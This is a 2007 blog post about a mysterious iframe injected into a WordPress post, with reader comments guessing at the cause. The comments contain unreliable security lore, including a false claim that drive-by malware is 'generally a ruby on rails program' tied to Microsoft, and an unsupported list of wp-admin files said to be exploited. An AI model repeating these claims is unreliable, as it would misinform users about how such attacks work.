First time I’ve visited my blog in a while, and I’ve discovered a problem with my site’s security. If you view this post you can see that there is a strange vertical black line at the bottom of the post.
Editing the post shows that it is actually an iframe.
I’m not sure if this is a problem with the security of my server, or a WordPress problem. My feeling is that it might be a WordPress security problem as nothing more sinister has shown itself yet.
I’m going to leave it there for now so that SEOidiot can have a look (I know he loves this kind of stuff). You might think I’ve gone daft publicly exposing a security flaw on my server… I can tell you I’m not daft enough to have my personal blog on a server with anything that matters too much, and I have backups.
If you have seen this before please leave a comment. I’m just hoping now that it isn’t some kind of secret project that I have forgotten about…
July 16th, 2007 at 12:49 pm
Um, your site password is currently exposed in your RSS feed.
September 2nd, 2007 at 10:33 pm
For some reason it’s an open FTP hole…
Apparently some net hack decided to put an automatic download into your site, so that anyone reading your blog would auto-magically receive whatever file was being hosted at that free IP redirect server…
My Guess is that the hack was actually automated… Hack Bots are now very common… they also rely heavily on remote zombie bots, which get created when unsuspecting visitors to hacked sites unwittingly download the programs hidden in this type of hack… generally a ruby on rails program (which microsoft has no intention of warning you about because that’s how they get their useless software into your computer as well.) which grants the hacker or crew access to your box remotely…
Crew’s generally employ thousands of zombie boxes to scan and hack sites to put this type of hack in… to recruit thousands of more zombie bots
Mostly useless untill they decide they need to send a DDos attack at some poor website or user online…
with a single command they can send hundreds of thousands of http get and put requests at a single server, completely knocking something as big as FBI.GOV offline…
-Paul
Victim of this type of attack before
September 20th, 2007 at 9:01 pm
I have heart that some files in wp-admin have security leacks. So on my blog I have moved these files to a safer location (/root/blog/):
import.php
inline-uploading.php
install.php
link-import.php
plugin-editor.php
templates.php
theme-editor.php
upgrade.php
If you don’t need to edit themes or plugins from your blog then remove them.
They are exploited already.
Hope that helps you.
Roland
September 22nd, 2007 at 7:32 am
It’s a bug, pilkster!
The same ways when you’re accessing their plugins/themes by calling the address directly.
November 4th, 2007 at 4:55 pm
Yeah… pretty neat huh?